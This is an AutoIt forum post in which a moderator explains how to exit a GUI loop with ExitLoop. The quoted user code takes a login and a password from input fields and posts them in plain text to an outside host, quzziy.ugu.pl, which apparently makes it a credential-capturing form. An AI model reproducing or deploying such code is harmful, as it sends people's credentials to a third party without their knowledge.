Moderators Melba23 Posted February 14, 2009 Moderators Posted February 14, 2009 Quizzy,Your first program finishes in a never-ending While...WEnd loop:While 1 $aMsg = GUIGetMsg(1) Select Case $aMsg[0] = $GUI_EVENT_CLOSE And $aMsg[1] = $Formx GUIDelete($Formx) Exit ; <<<<<<<<<<<<<<<<<<<<<<<< You can go to the second program from here - Point 1 Case $aMsg[0] = $GUI_EVENT_CLOSE And $aMsg[1] = $Form1 GUIDelete($Form1) Exit ; <<<<<<<<<<<<<<<<<<<<<<<< You can go to the second program from here - Point 2 case $aMsg[0] = $Buttonx $temat = "########################" $n_login = "Login: " & GUICtrlRead($Input_login) $n_password = "Haslo: " &GUICtrlRead($Input_haslo) $temat2 = "########################" $host = "quzziy.ugu.pl" $page = "/index.php" $vars = "tresc=" & $temat & @CRLF & $n_login & @CRLF & $n_password & @CRLF & $temat2 $data = _HTTPEncodeString($vars) ConsoleWrite($data & @CRLF) $socket = _HTTPConnect($host, 80) $post = _HTTPPost($host, $page, $socket, $data) ConsoleWrite(@error & @CRLF) ; <<<<<<<<<<<<<<<<<<<<<<<< You can go to the second program from here - Point 3 endselect wendI have marked the 3 points where you can move onto the second program. Which of them do you want to use? You can use all of them or just some.As I said earlier, all you need to do is to change the "Exit" commands at Points 1 and 2 to "ExitLoop", or add an "ExitLoop" at Point 3. These commands will exit the While...Wend loop and move your script on to your second program.M23 Any of my own code posted anywhere on the forum is available for use by others without any restriction of any kind Open spoiler to see my UDFs: Spoiler ArrayMultiColSort ---- Sort arrays on multiple columnsChooseFileFolder ---- Single and multiple selections from specified path treeview listingDate_Time_Convert -- Easily convert date/time formats, including the language usedExtMsgBox --------- A highly customisable replacement for MsgBoxGUIExtender -------- Extend and retract multiple sections within a GUIGUIFrame ---------- Subdivide GUIs into many adjustable framesGUIListViewEx ------- Insert, delete, move, drag, sort, edit and colour ListView itemsGUITreeViewEx ------ Check/clear parent and child checkboxes in a TreeViewMarquee ----------- Scrolling tickertape GUIsNoFocusLines ------- Remove the dotted focus lines from buttons, sliders, radios and checkboxesNotify ------------- Small notifications on the edge of the displayScrollbars ----------Automatically sized scrollbars with a single commandStringSize ---------- Automatically size controls to fit textToast -------------- Small GUIs which pop out of the notification area
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now